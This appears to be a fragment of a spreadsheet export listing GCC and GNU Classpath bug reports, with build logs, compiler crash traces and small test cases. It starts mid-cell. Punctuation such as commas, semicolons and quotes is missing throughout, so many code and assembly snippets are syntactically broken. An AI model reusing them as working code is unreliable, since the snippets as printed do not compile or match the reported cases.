        /home/build/gcc-4.2-build/./gcc/xgcc -shared-libgcc -B/home/build/gcc-4.2-build/./gcc -nostdinc++ -L/home/build/gcc-4.2-build/mipsel-unknown-linux-gnu/libstdc++-v3/src -L/home/build/gcc-4.2-build/mipsel-unknown-linux-gnu/libstdc++-v3/src/.libs -B/usr/local/mipsel-unknown-linux-gnu/bin/ -B/usr/local/mipsel-unknown-linux-gnu/lib/ -isystem /usr/local/mipsel-unknown-linux-gnu/include -isystem /usr/local/mipsel-unknown-linux-gnu/sys-include -Winvalid-pch -Wno-deprecated -x c++-header -g -O2  -D_GNU_SOURCE -I/home/build/gcc-4.2-build/mipsel-unknown-linux-gnu/libstdc++-v3/include/mipsel-unknown-linux-gnu -I/home/build/gcc-4.2-build/mipsel-unknown-linux-gnu/libstdc++-v3/include -I/home/build/gcc-4.2.0-20070501/libstdc++-v3/libsupc++ -O2 -g /home/build/gcc-4.2.0-20070501/libstdc++-v3/include/precompiled/extc++.h -o mipsel-unknown-linux-gnu/bits/extc++.h.gch/O2g.gch
In file included from /home/build/gcc-4.2-build/mipsel-unknown-linux-gnu/libstdc++-v3/include/ext/pb_ds/detail/container_base_dispatch.hpp:53
                 from /home/build/gcc-4.2-build/mipsel-unknown-linux-gnu/libstdc++-v3/include/ext/pb_ds/assoc_container.hpp:53
                 from /home/build/gcc-4.2.0-20070501/libstdc++-v3/include/precompiled/extc++.h:59:
/home/build/gcc-4.2-build/mipsel-unknown-linux-gnu/libstdc++-v3/include/ext/pb_ds/detail/list_update_map_/lu_map_.hpp:142:72: error: ext/pb_ds/detail/unordered_iterator/const_point_iterator.hpp: No such file or directory
In file included from /home/build/gcc-4.2-build/mipsel-unknown-linux-gnu/libstdc++-v3/include/ext/pb_ds/detail/priority_queue_base_dispatch.hpp:51
                 from /home/build/gcc-4.2-build/mipsel-unknown-linux-gnu/libstdc++-v3/include/ext/pb_ds/priority_queue.hpp:51
                 from /home/build/gcc-4.2.0-20070501/libstdc++-v3/include/precompiled/extc++.h:60:
/home/build/gcc-4.2-build/mipsel-unknown-linux-gnu/libstdc++-v3/include/ext/pb_ds/detail/binomial_heap_/binomial_heap_.hpp:56:72: error: ext/pb_ds/detail/binomial_heap_base_/binomial_heap_base_.hpp: No such file or directory
.
.
.</t>
  </si>
  <si>
    <t>GCC-63150</t>
  </si>
  <si>
    <t>[4.9 Regression] FAIL: gcc.target/powerpc/pr53199.c scan-assembler-times *</t>
  </si>
  <si>
    <t>I see these failures in Power/Linux testing with 4.9.1 and also trunk
(5.0) so presumably the regression happened sometime between 4.8 and
4.9:
FAIL: gcc.target/powerpc/pr53199.c scan-assembler-times lwbrx 6
FAIL: gcc.target/powerpc/pr53199.c scan-assembler-times stwbrx 6
These tests passed with 4.8.  This is with powerpc-linux-gnu.
I've looked at generated assembly and actually 2 out of 6 cases fail:
load64_reverse_2 and store64_reverse_2 the remaining 4 are fine.  In
all cases code produced looks correct so this is a missed optimisation
rather a code correctness issue.
Options used to configure the compiler:
--build=i686-pc-linux-gnu
--target=powerpc-linux-gnu
--with-cpu-32=603e
--with-cpu-64=e5500
--with-long-double-128
Actually even with 4.8 code that the test case accepts it looks like
we've got another missed optimisation here because we do:
	lwbrx 809
	lwbrx 7010
	mr 48
	mr 37
	blr
while we could do:
	lwbrx 409
	lwbrx 3010
	blr
instead.  But that's of course a different matter.</t>
  </si>
  <si>
    <t>macro</t>
  </si>
  <si>
    <t>GCC-57329</t>
  </si>
  <si>
    <t>ICE with -O2 and -mthumb</t>
  </si>
  <si>
    <t>Created attachment 30146
pixman-ice.c
Hi when compiling pixman for armv4t or armv5te with thumb enabled I've noticed ICE disabling thumb or O2 is enough to build it without ICE.
$ arm-oe-linux-gnueabi-gcc -march=armv5te -mthumb -O2 -c pixman-ice.c -o pixman-ice.o
pixman-ice.c: In function 'prng_srand_r':
pixman-ice.c:113:1: internal compiler error: Segmentation fault
 }
 ^
Please submit a full bug report
with preprocessed source if appropriate.
See  for instructions.
pixman-ice.c and preprocessed pixman-ice.E attached.</t>
  </si>
  <si>
    <t>GCC-8321</t>
  </si>
  <si>
    <t>SimpleTimeZone doesn't work properly for daylight saving time.</t>
  </si>
  <si>
    <t xml:space="preserve">	When I ran the folllowing code
	  Date date = new Date(1034705556525l)
	  TimeZone zone  = TimeZone.getTimeZone(EST)
          DateFormat dateFormat = DateFormat.getDateTimeInstance(
                        DateFormat.SHORT
                        DateFormat.LONG
                        Locale.getDefault())
	  dateFormat.setTimeZone(zone)
          System.out.println(dateFormat.format(new Date()))
	I got
	   10/15/2002 1:12:36 AM EST
	but I expected 
	   10/15/2002 2:12:36 AM EDT
	because 10/23 is still in daylight saving time.
	I checked the code of SimpleTimeZone.java. The function setEndRule
	changes endDay to its absolute value that is wrong in this case. The
	time zone instance for EST is
	    new SimpleTimeZone 
		  (-5000 * 3600 EST
       		  Calendar.APRIL 1 Calendar.SUNDAY 2000 * 3600
       		  Calendar.OCTOBER -1 Calendar.SUNDAY 2000 * 3600)
	that has endDay -1. Turning -1 to 1 changes the end date of daylight
	saving time from the last Sunday to the first Sunday in October.
	The same thing happens for setStartRule.
	After removing the Math.abs from the code I got the time I want.
Release:
3.1
Environment:
System: Linux build2 2.4.9-12 #1 Tue Oct 30 18:33:49 EST 2001 i686 unknown
Architecture: i686
host: i686-pc-linux-gnu
build: i686-pc-linux-gnu
target: i686-pc-linux-gnu
configured with: ../gcc/configure --host=i686-pc-linux-gnu --prefix=/home/dongfeng/gcc/temp --enable-shared --enable-threads=posix --enable-languages=cc++java --enable-version-specific-runtime-libs
How-To-Repeat:
 	Run above code.</t>
  </si>
  <si>
    <t>dongfeng</t>
  </si>
  <si>
    <t>CLASSPATH-16687</t>
  </si>
  <si>
    <t>Timer restart doesn't stop the the timer and clear out pending ActionEvents</t>
  </si>
  <si>
    <t>Attached a test case. (Move the mouse over the button and watch it fire lots of
ActionEvents as the Timer gets restarted.)
A restart of the Timer should cause it to wait the full length of the delay and
fire one ActionEvent.
Working on a patch.</t>
  </si>
  <si>
    <t>GCC-36827</t>
  </si>
  <si>
    <t>[4.3/4.4/4.5 Regression] newlib:libm/math/k_rem_pio2.c fails in reload</t>
  </si>
  <si>
    <t>as of rev 137639:
cc1 -fpreprocessed k_rem_pio2.i -quiet -dumpbase k_rem_pio2.c -auxbase-strip lib_a-k_rem_pio2.o -Os -fno-builtin -o k_rem_pio2.s
src/newlib/libm/math/k_rem_pio2.c: In function '__kernel_rem_pio2':
newlib/libm/math/k_rem_pio2.c:318: error: unable to find a register to spill in class 'A_REGS'
newlib/libm/math/k_rem_pio2.c:318: error: this is the insn:
(jump_insn 1098 1096 2868 9 newlib/libm/math/k_rem_pio2.c:186 (set (pc)
        (if_then_else (gt (subreg:HI (reg/v:SI 1108 [ i ]) 2)
                (subreg:HI (reg/v:SI 1105 [ m ]) 2))
            (label_ref:HI 3007)
            (pc))) 48 {cbranchhi4} (expr_list:REG_BR_PROB (const_int 5000 [0x1388])
        (nil)))
newlib/libm/math/k_rem_pio2.c:318: internal compiler error: in spill_failure at reload1.c:1995</t>
  </si>
  <si>
    <t>GCC-18800</t>
  </si>
  <si>
    <t>[4.0 Regression] ivopt missed</t>
  </si>
  <si>
    <t>If we make bitStreamLink a global variable it works.
void f3(int)
void f1 (void)
{
  int  ixBlock
  int bitStreamLink[9]
  for(ixBlock=0 ixBlock&lt;=7 ixBlock++){
    bitStreamLink[ixBlock] = 0x1e1e1e1e
  }
  f3 (bitStreamLink[2])
}</t>
  </si>
  <si>
    <t>GCC-13729</t>
  </si>
  <si>
    <t>[tree-ssa] ICE: Missing callgraph edge for call expr</t>
  </si>
  <si>
    <t>When I call g++ with the command listed in COMMAND I receive the lengthy 
error message from OUTPUT.  It closes with the text 
internal compiler error: verify_cgraph_node failed. 
I will attach the preprocessed source code as Setup.cc.i.  This is with g++ 
version 
g++ (GCC) 3.5-tree-ssa 20040118 (merged 20040102) 
with a checkout from today.</t>
  </si>
  <si>
    <t>GCC-82395</t>
  </si>
  <si>
    <t>[8 Regression] qsort comparator non-negative on sorted output: 1 in color_allocnos</t>
  </si>
  <si>
    <t>After Alexander added the validation (r253295) we ICE on:
./xgcc -B. /home/marxin/Programming/gcc/gcc/testsuite/gcc.dg/tree-prof/pr44777.c  -fira-algorithm=priority -Og
/home/marxin/Programming/gcc/gcc/testsuite/gcc.dg/tree-prof/pr44777.c: In function â€˜yâ€™:
/home/marxin/Programming/gcc/gcc/testsuite/gcc.dg/tree-prof/pr44777.c:31:5: error: qsort comparator non-negative on sorted output: 1
     }
     ^
during RTL pass: ira
/home/marxin/Programming/gcc/gcc/testsuite/gcc.dg/tree-prof/pr44777.c:31:5: internal compiler error: qsort checking failed
0x1b54377 qsort_chk_error
	../../gcc/vec.c:222
0x1b5473f qsort_chk(void* unsigned long unsigned long int (*)(void const* void const*))
	../../gcc/vec.c:274
0xd12e34 color_allocnos
	../../gcc/ira-color.c:3087
0xd13887 color_pass
	../../gcc/ira-color.c:3261
0xcf81b3 ira_traverse_loop_tree(bool ira_loop_tree_node* void (*)(ira_loop_tree_node*) void (*)(ira_loop_tree_node*))
	../../gcc/ira-build.c:1781
0xd141f6 do_coloring
	../../gcc/ira-color.c:3412
0xd17f38 color
	../../gcc/ira-color.c:4782
0xd185a4 ira_color()
	../../gcc/ira-color.c:4897
0xcf2c3f ira
	../../gcc/ira.c:5283
0xcf340e execute
	../../gcc/ira.c:5581</t>
  </si>
  <si>
    <t>GCC-58614</t>
  </si>
  <si>
    <t>[c++11] ICE with undeclared variable in initializer list</t>
  </si>
  <si>
    <t>The following invalid code snippet (compiled with -std=c++11 or -std=c++0x for older versions) triggers an ICE since GCC 4.4.0 (when initializer lists were introduced):
===============================
#include 
void foo()
{
  i
  auto j { i }
}
===============================
bug.cc: In function 'void foo()':
bug.cc:5:3: error: 'i' was not declared in this scope
   i
   ^
bug.cc:6:14: internal compiler error: tree check: expected class 'type' have 'exceptional' (error_mark) in maybe_adjust_types_for_deduction at cp/pt.c:15597
   auto j { i }
              ^
0xcd8a39 tree_class_check_failed(tree_node const* tree_code_class char const* int char const*)
        ../../gcc/gcc/tree.c:9227
0x5814af tree_class_check
        ../../gcc/gcc/tree.h:2732
0x5814af maybe_adjust_types_for_deduction
        ../../gcc/gcc/cp/pt.c:15597
0x5c45d0 unify
        ../../gcc/gcc/cp/pt.c:16914
0x5cdb8a unify_one_argument
        ../../gcc/gcc/cp/pt.c:15900
0x5c2cf2 type_unification_real
        ../../gcc/gcc/cp/pt.c:15972
0x5d69b2 do_auto_deduction(tree_node* tree_node* tree_node*)
        ../../gcc/gcc/cp/pt.c:21153
0x5696cd cp_finish_decl(tree_node* tree_node* bool tree_node* int)
        ../../gcc/gcc/cp/decl.c:6151
0x65119f cp_parser_init_declarator
        ../../gcc/gcc/cp/parser.c:16568
0x6518bf cp_parser_simple_declaration
        ../../gcc/gcc/cp/parser.c:10986
0x653740 cp_parser_block_declaration
        ../../gcc/gcc/cp/parser.c:10867
0x654860 cp_parser_declaration_statement
        ../../gcc/gcc/cp/parser.c:10514
0x63d097 cp_parser_statement
        ../../gcc/gcc/cp/parser.c:9274
0x63e3a2 cp_parser_statement_seq_opt
        ../../gcc/gcc/cp/parser.c:9552
0x63e4e6 cp_parser_compound_statement
        ../../gcc/gcc/cp/parser.c:9506
0x64f89b cp_parser_function_body
        ../../gcc/gcc/cp/parser.c:18319
0x64f89b cp_parser_ctor_initializer_opt_and_function_body
        ../../gcc/gcc/cp/parser.c:18355
0x6508ef cp_parser_function_definition_after_declarator
        ../../gcc/gcc/cp/parser.c:22340
0x651605 cp_parser_function_definition_from_specifiers_and_declarator
        ../../gcc/gcc/cp/parser.c:22261
0x651605 cp_parser_init_declarator
        ../../gcc/gcc/cp/parser.c:16348
Please submit a full bug report [etc.]</t>
  </si>
  <si>
    <t>GCC-42631</t>
  </si>
  <si>
    <t>[4.5 Regression] -fcompare-debug failure with -O1 -funroll-loops</t>
  </si>
  <si>
    <t>Command line:
gcc -O1 -funroll-loops -fcompare-debug -c testcase.c
Tested revisions:
r155643 - crash (x86_64)
r155290 - crash (x86)
r153685 - crash (x86_64)
Output:
$ /mnt/svn/gcc-trunk/binary-153685-lto/bin/gcc -O1 -funroll-loops -fcompare-debug -c testcase.c
gcc: testcase.c: -fcompare-debug failure
================== testcase.c ==================
void foo()
{
  unsigned k /* doesn't crash with 'int' or when initialized */
  while (--k &gt; 0)
}
================================================</t>
  </si>
  <si>
    <t>GCC-9643</t>
  </si>
  <si>
    <t>Re: Regression: gcc-3.x fails to compile virtual inheritance with</t>
  </si>
  <si>
    <t xml:space="preserve"> Hello
 I have tested. It doesn't work.
 Either with gcc 3.2.1 on debian sarge nor with gcc 3.2.2 on debian sid.
 Thanks for your works
 Regards
 Stephane
 On Thu 6 Feb 2003 Peter Amstutz wrote:
 &gt; -----BEGIN PGP SIGNED MESSAGE-----
 &gt; Hash: SHA1
 &gt;
 &gt; The release notes for g++-3.2.1 suggest that this bug was fixed however
 &gt; my experience with g++ 3.2.2-1 in Debian is otherwise -- the bug persists.
 &gt; Perhaps this is a problem with Debian or was the bug in fact not fixed in
 &gt; 3.2.1?  Has the fix been verified with the test case shown in the bug
 &gt; report?  Please help!
 &gt;
 &gt; [   Peter Amstutz   ][ amstutz@cs.umass.edu ][ tetron@interreality.org  ]
 &gt; [Lead Programmer][Interreality Project][Virtual Reality for the Internet]
 &gt; [ VOS: Next Generation Internet Communication][ http://interreality.org ]
 &gt; [ http://interreality.org/~tetron ][ pgpkey:  pgpkeys.mit.edu  18C21DF7 ]
 &gt; -----BEGIN PGP SIGNATURE-----
 &gt; Version: GnuPG v1.0.7 (GNU/Linux)
 &gt;
 &gt; iD8DBQE+QpfsaeHUyhjCHfcRAndkAJ9h1ICWT/gKJ3W95prUSHWYdJnorQCfeQIT
 &gt; IGIzKiLQQbVOlbde6vWEc1A=
 &gt; =r2Ig
 &gt; -----END PGP SIGNATURE-----
 &gt;
Release:
unknown
Unformatted:
  variable number of argument method</t>
  </si>
  <si>
    <t>nct</t>
  </si>
  <si>
    <t>GCC-28084</t>
  </si>
  <si>
    <t>[4.2 Regression] /usr/include/errno.h:28: error: previous declaration of 'int errno' with 'C++' linkage</t>
  </si>
  <si>
    <t>/mnt/gnu/gcc/objdir/./gcc/xgcc -shared-libgcc -B/mnt/gnu/gcc/objdir/./gcc -nostd
inc++ -L/mnt/gnu/gcc/objdir/hppa2.0w-hp-hpux11.11/libstdc++-v3/src -L/mnt/gnu/gc
c/objdir/hppa2.0w-hp-hpux11.11/libstdc++-v3/src/.libs -B/opt/gnu/gcc/gcc-4.2.0/h
ppa2.0w-hp-hpux11.11/bin/ -B/opt/gnu/gcc/gcc-4.2.0/hppa2.0w-hp-hpux11.11/lib/ -i
system /opt/gnu/gcc/gcc-4.2.0/hppa2.0w-hp-hpux11.11/include -isystem /opt/gnu/gc
c/gcc-4.2.0/hppa2.0w-hp-hpux11.11/sys-include -I/mnt/gnu/gcc/objdir/hppa2.0w-hp-
hpux11.11/libstdc++-v3/include/hppa2.0w-hp-hpux11.11 -I/mnt/gnu/gcc/objdir/hppa2
.0w-hp-hpux11.11/libstdc++-v3/include -I/mnt/gnu/gcc/gcc/libstdc++-v3/libsupc++
-fno-implicit-templates -Wall -Wextra -Wwrite-strings -Wcast-qual -fdiagnostics-
show-location=once -g -O2 -c c++locale.cc  -fPIC -DPIC -o .libs/c++locale.o
/usr/include/errno.h:28: error: previous declaration of 'int errno' with 'C++' linkage
/usr/include/sys/errno.h:48: error: conflicts with new declaration with 'C' linkage
make[4]: *** [c++locale.lo] Error 1
make[4]: Leaving directory `/mnt/gnu/gcc/objdir/hppa2.0w-hp-hpux11.11/libstdc++-
v3/src'
make[3]: *** [all-recursive] Error 1
make[3]: Leaving directory `/mnt/gnu/gcc/objdir/hppa2.0w-hp-hpux11.11/libstdc++-
v3'
make[2]: *** [all] Error 2
-bash-2.05b$ ./xgcc -B./ -v
Reading specs from ./specs
Target: hppa2.0w-hp-hpux11.11
Configured with: ../gcc/configure --with-gnu-as --with-as=/opt/gnu/bin/as --enable-shared --with-local-prefix=/opt/gnu --prefix=/opt/gnu/gcc/gcc-4.2.0 --with-gmp=/opt/gnu/gcc/gcc-4.2.0 --enable-debug=no --disable-nls --enable-threads=posix --enable-languages=cc++objcfortranjavaadaobj-c++
Thread model: posix
gcc version 4.2.0 20060619 (experimental)</t>
  </si>
  <si>
    <t>GCC-11468</t>
  </si>
  <si>
    <t>Deriving from CNI class java::lang::Object  causing an ICE</t>
  </si>
  <si>
    <t>Based upon the documentation for CNI (Interoperating with C/C++) it looks like 
it should be possible to derive my own native CNI class from 
java::lang::Object. However when I compile the enclosed example there is a 
problem with the generated object it contains no vtable for the class and 
there is an issue with creating the static variable class$. Am I doing 
something wrong or is this feature broken?
The compilation output was obtained by commenting out the derivation of MyClass 
from java::lang::Object.
Compiler output start++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
g++ -v -save-temps -o testit testit.cc -lgcj
Reading specs from /home/scratch_scarp/shanes/xaud_work/C++/GCC/gcc-
3.3/install2/lib/gcc-lib/i686-pc-linux-gnu/3.3/specs
Configured with: ../configure --enable-java-gc=boehm --enable-fast-character --
prefix=/home/scratch_scarp/shanes/xaud_work/C++/GCC/gcc-3.3/install2 : 
(reconfigured) ../configure --enable-threads=posix --enable-java-gc=boehm --
enable-fast-character --prefix=/home/scratch_scarp/shanes/xaud_work/C++/GCC/gcc-
3.3/install2 --enable-shared --enable-languages=c++java
Thread model: posix
gcc version 3.3
 /home/scratch_scarp/shanes/xaud_work/C++/GCC/gcc-3.3/install2/lib/gcc-lib/i686-
pc-linux-gnu/3.3/cc1plus -E -D__GNUG__=3 -quiet -v -D__GNUC__=3 -
D__GNUC_MINOR__=3 -D__GNUC_PATCHLEVEL__=0 -D_GNU_SOURCE testit.cc testit.ii
ignoring nonexistent directory /usr/local/include
ignoring nonexistent 
directory /home/scratch_scarp/shanes/xaud_work/C++/GCC/gcc-3.3/install2/i686-
pc-linux-gnu/include
#include ... search starts here:
#include  search starts here:
 /home/scratch_scarp/shanes/xaud_work/C++/GCC/gcc-3.3/install2/include/c++/3.3
 /home/scratch_scarp/shanes/xaud_work/C++/GCC/gcc-
3.3/install2/include/c++/3.3/i686-pc-linux-gnu
 /home/scratch_scarp/shanes/xaud_work/C++/GCC/gcc-
3.3/install2/include/c++/3.3/backward
 /home/scratch_scarp/shanes/xaud_work/C++/GCC/gcc-3.3/install2/include
 /home/scratch_scarp/shanes/xaud_work/C++/GCC/gcc-3.3/install2/lib/gcc-lib/i686-
pc-linux-gnu/3.3/include
 /usr/include
End of search list.
 /home/scratch_scarp/shanes/xaud_work/C++/GCC/gcc-3.3/install2/lib/gcc-lib/i686-
pc-linux-gnu/3.3/cc1plus -fpreprocessed testit.ii -quiet -dumpbase testit.cc -
auxbase testit -version -o testit.s
GNU C++ version 3.3 (i686-pc-linux-gnu)
        compiled by GNU C version 2.96 20000731 (Red Hat Linux 7.1 2.96-98).
GGC heuristics: --param ggc-min-expand=98 --param ggc-min-heapsize=128433
 as --traditional-format -V -Qy -o testit.o testit.s
GNU assembler version 2.11.90.0.8 (i386-redhat-linux) using BFD version 
2.11.90.0.8
 /home/scratch_scarp/shanes/xaud_work/C++/GCC/gcc-3.3/install2/lib/gcc-lib/i686-
pc-linux-gnu/3.3/collect2 -m elf_i386 -dynamic-linker /lib/ld-linux.so.2 -o 
testit /usr/lib/crt1.o /usr/lib/crti.o /home/scratch_scarp/shanes/xaud_work/C++/
GCC/gcc-3.3/install2/lib/gcc-lib/i686-pc-linux-gnu/3.3/crtbegin.o -
L/home/scratch_scarp/shanes/xaud_work/C++/GCC/gcc-3.3/install2/lib/gcc-lib/i686-
pc-linux-gnu/3.3 -L/home/scratch_scarp/shanes/xaud_work/C++/GCC/gcc-
3.3/install2/lib/gcc-lib/i686-pc-linux-gnu/3.3/../../.. testit.o -lgcj -
lstdc++ -lm -lgcc_s -lgcc -lc -lgcc_s -
lgcc /home/scratch_scarp/shanes/xaud_work/C++/GCC/gcc-3.3/install2/lib/gcc-
lib/i686-pc-linux-gnu/3.3/crtend.o /usr/lib/crtn.o
Compiler output end++++++++++++++++++++++++++++++++++++++++++++++++++++
Test Code start---------------------------------------------------------
#include 
#include 
#include 
#include 
#include 
#include 
using namespace std
class ::MyClass //: public java::lang::Object // &lt;--Uncomment to see problem!
{
public:
  gnu::gcj::RawData * string
  MyClass ()
  gnu::gcj::RawData * getText ()
  void printText ()
}
::MyClass::MyClass()
{
  char* text = 44444
  string = (gnu::gcj::RawData * )text
}
gnu::gcj::RawData *
::MyClass::getText ()
{
  return string
}
void
::MyClass::printText ()
{
  printf(%s\n (char*) string)
}
void
PassTest(java::lang::String * text)
{
  string stext((char *)JvGetStringChars(text)2*JvGetStringUTFLength(text))
  cerr &lt;&lt; ' &lt;&lt; stext &lt;&lt; ' &lt;&lt; endl
}
int
main(int argc
    char *argv[])
{
  JvCreateJavaVM(NULL)
  JvAttachCurrentThread(NULL NULL)
  JvInitClass(
  java::lang::String * string = JvNewStringLatin1(trace)
  PassTest(string)
  MyClass * abc = new MyClass
  abc-&gt;printText()
  return 0
}
Test code end------------------------------------------------------------</t>
  </si>
  <si>
    <t>shanes</t>
  </si>
  <si>
    <t>GCC-34760</t>
  </si>
  <si>
    <t>[4.3 Regression] PRIVATE variable not allowed as STAT variable in ALLOCATE</t>
  </si>
  <si>
    <t>With gfortran 4.3.0 20080109 I get the error message
     ALLOCATE (RLA1(NF10) STAT = ISTAT)
                                      1
Error: STAT expression at (1) must be a variable
With the following program.
     MODULE TESTS
     INTEGER PRIVATE :: ISTAT       !this one FAILS
!      INTEGER :: ISTAT               !this one works
!      PRIVATE :: ISTAT               !this one FAILS
     CONTAINS
     SUBROUTINE AD0001
     REAL RLA1(:)
     ALLOCATABLE RLA1
     ISTAT = -314
     ALLOCATE (RLA1(NF10) STAT = ISTAT)
     END SUBROUTINE
     END MODULE
In the real module there are several subroutines that do similar
allocates and they do not generate the error.  It looks like it is
only the first use of ISTAT in an allocate that triggers the message.
Dick Hendrickson</t>
  </si>
  <si>
    <t>GCC-535</t>
  </si>
  <si>
    <t>Internal error on long long int *= conditional.</t>
  </si>
  <si>
    <t>/usr/local/development/gcc-2.95.2/bin/g++ -c       -g -Wreturn-type gcc295bug.cc
gcc295bug.cc: In function `long long int bug(int int long long int)':
gcc295bug.cc:9: Internal compiler error.
gcc295bug.cc:9: Please submit a full bug report.
gcc295bug.cc:9: See  for instructions.
Compilation exited abnormally with code 1 at Thu Sep 14 10:26:20
Release:
gcc-2.95.2
Environment:
SunOS phoenix 5.7 Generic_106541-08 sun4u sparc SUNWUltra-80
How-To-Repeat:
Put this function all by itself in a file and compile.
long long int bug(int a int b long long int val)
{
  long long int increment = val
  increment *= (a == b) ? -1 : 1
  return increment
}</t>
  </si>
  <si>
    <t>canfield</t>
  </si>
  <si>
    <t>CLASSPATH-28412</t>
  </si>
  <si>
    <t>[regex] Matcher.hitEnd missing</t>
  </si>
  <si>
    <t>Our java.util.regex.Matcher is missing the hitEnd method.
This prevents us from properly implementing java.util.Scanner.</t>
  </si>
  <si>
    <t>GCC-5849</t>
  </si>
  <si>
    <t>function which has been implemented intype conversion rather than function overloading</t>
  </si>
  <si>
    <t>In a base class a virtual member function called action is 
defined and implemented which expects a float variable and 
which returns nothing.
Now a new class is created via inheritance from the base 
class. In this new class another virtual member function is
declared as well as implemented which is also called action
and which expects a bool variable. This function also returns 
nothing.
When an instance of the cild class is created and the 
function action is invoked with a float number the 
float number is obviously casted to an bool since this 
member function is invoked instead of the right one which 
was implented in the base class. 
If both member function were declared in the base class
the right one would be invoked. The decision which function
has to be used seems to depend on where the functions were
declared.
Release:
gcc-3.0.4
Environment:
Sun OS 5
How-To-Repeat:
by mail</t>
  </si>
  <si>
    <t>andreas.tewes</t>
  </si>
  <si>
    <t>GCC-3461</t>
  </si>
  <si>
    <t>Internal compiler error while compiling ncurses-5.2 comp_hash.c (do_alloc.c)</t>
  </si>
  <si>
    <t>gcc -o make_hash.exe -v -save-temps -O2  -I../ncurses -I.  -DNDEBUG -I. -I../inc
lude -I/usr/local/include -DHAVE_CONFIG_H -DMAIN_PROGRAM ./tinfo/comp_hash.c
Reading specs from /usr/local/lib/gcc-lib/i686-pc-cygwin/3.0/specs
Configured with: ../../src/gcc-3.0/configure i686-pc-cygwin --enable-threads=win
32 --enable-languages=c++java -enable-shared
Thread model: win32
gcc version 3.0
 /usr/local/lib/gcc-lib/i686-pc-cygwin/3.0/cpp0.exe -lang-c -v -I../ncurses -I.
-I. -I../include -I/usr/local/include -D__GNUC__=3 -D__GNUC_MINOR__=0 -D__GNUC_P
ATCHLEVEL__=0 -D_X86_=1 -D_X86_=1 -Asystem=winnt -D__OPTIMIZE__ -D__STDC_HOSTED_
_=1 -Acpu=i386 -Amachine=i386 -Di386 -D__i386 -D__i386__ -D__tune_i686__ -D__tun
e_pentiumpro__ -D__stdcall=__attribute__((__stdcall__)) -D__cdecl=__attribute__(
(__cdecl__)) -D_stdcall=__attribute__((__stdcall__)) -D_cdecl=__attribute__((__c
decl__)) -D__declspec(x)=__attribute__((x)) -D__i386__ -D__i386 -D__CYGWIN32__ -
D__CYGWIN__ -Dunix -D__unix__ -D__unix -isystem /usr/local/include -idirafter /u
sr/include -idirafter /usr/include/w32api -DNDEBUG -DHAVE_CONFIG_H -DMAIN_PROGRA
M ./tinfo/comp_hash.c comp_hash.i
GNU CPP version 3.0 (cpplib) (80386 BSD syntax)
ignoring duplicate directory .
ignoring duplicate directory .
ignoring duplicate directory /usr/local/include
#include ... search starts here:
#include  search starts here:
 ../ncurses
 ../include
 /usr/local/include
 /usr/local/lib/gcc-lib/i686-pc-cygwin/3.0/include
 /usr/include
 /usr/include/w32api
End of search list.
In file included from ../ncurses/curses.priv.h:48
                 from tinfo/comp_hash.c:41:
../include/ncurses_dll.h:15:24: warning: extra tokens at end of #undef directive
../include/ncurses_dll.h:16:28: warning: extra tokens at end of #undef directive
In file included from ../include/curses.h:57
                 from ../ncurses/curses.priv.h:236
                 from tinfo/comp_hash.c:41:
../include/ncurses_dll.h:15:24: warning: extra tokens at end of #undef directive
../include/ncurses_dll.h:16:28: warning: extra tokens at end of #undef directive
 /usr/local/lib/gcc-lib/i686-pc-cygwin/3.0/cc1.exe -fpreprocessed comp_hash.i -q
uiet -dumpbase comp_hash.c -O2 -version -o comp_hash.s
GNU CPP version 3.0 (cpplib) (80386 BSD syntax)
GNU C version 3.0 (i686-pc-cygwin)
        compiled by GNU C version 3.0.
In file included from tinfo/comp_hash.c:69:
../ncurses/tinfo/doalloc.c: In function `_nc_doalloc':
../ncurses/tinfo/doalloc.c:58: Internal compiler error in rest_of_compilation a
t toplev.c:3732
Release:
GNU C version 3.0 (i686-pc-cygwin)
Environment:
Pentium III 128MB RAM Win2K SP2.
Latest cygwin downloaded from redhat (uname -a)
CYGWIN_NT-5.0 DELLA 1.3.2(0.39/3/2) 2001-05-20 23:28 i686 unknown
How-To-Repeat:
configure/build ncurses-5.2 under latest cygwin</t>
  </si>
  <si>
    <t>mhcox</t>
  </si>
  <si>
    <t>GCC-23080</t>
  </si>
  <si>
    <t>cc -c  -O4 -DSYSINC -I/usr/include/lam -Df77IsF2C   -DBlacsDebugLvl=0  
-DUseMpi2   BI_BeComb.c
BI_BeComb.c: In function 'BI_BeComb':
BI_BeComb.c:102: internal compiler error: Segmentatie fout
Please submit a full bug report
with preprocessed source if appropriate.
See  for instructions.
For Debian GNU/Linux specific bug reporting instructions
see .
make[3]: *** [BI_BeComb.o] Fout 1</t>
  </si>
  <si>
    <t>GCC-7666</t>
  </si>
  <si>
    <t>Rejects a(b&amp;c) and looks for a(b c)</t>
  </si>
  <si>
    <t xml:space="preserve">There are two problems.
The compiler says it is looking for a function a(b c) and one of the candidates
is a(b&amp;c) and it doesn't think this function matches what it is looking for.
It doesn't seem to be able to use function results as values for
pass-by-reference.
The compiler is compiling a friend function of a derived class and it says it
can't access a protected member of the base class.
Release:
3.1.1
Environment:
System: Linux smbear.attbi.com 2.4.3-20mdk #1 Sun Apr 15 23:03:10 CEST 2001 i686 unknown
Architecture: i686
host: i686-pc-linux-gnu
build: i686-pc-linux-gnu
target: i686-pc-linux-gnu
configured with: ./configure --enable-languages=cc++ --disable-shared
How-To-Repeat:
g++ foo.cc -c -o foo.o -fmessage-length=99999
In file included from /usr/projects/geb/prolib.c++/.pb/Cpp_Includes/prolib.c++/standard.hh:105
                 from /usr/projects/geb/prolib.c++/string/string.cc:12:
		 /usr/projects/geb/prolib.c++/.pb/Cpp_Includes/prolib.c++/standard.hh:669: parse error before `}' token
		 line-map.c: file /usr/projects/geb/prolib.c++/string/string.cc left but not entered
		 In file included from /usr/projects/geb/prolib.c++/string/string.cc:12:
		 /usr/projects/geb/prolib.c++/.pb/Cpp_Includes/prolib.c++/standard.hh: In function `void flof()':
		 /usr/projects/geb/prolib.c++/.pb/Cpp_Includes/prolib.c++/standard.hh:133: no matching function for call to `Pl::String::Base_String std::allocator &gt;::Owns_t::Owns_t(Pl::String::Base_String std::allocator &gt;::Temp_t)'
		 /usr/projects/geb/prolib.c++/.pb/Cpp_Includes/prolib.c++/string/string.hh:475: candidates are: Pl::String::Base_String::Owns_t::Owns_t(const _Char_t*) [with _Char_t = char const Char_t*_Class_Print_Name = (&amp;Pl::String::Base_String_Print_Name) _Traits = std::char_traits _Allocator = std::allocator]
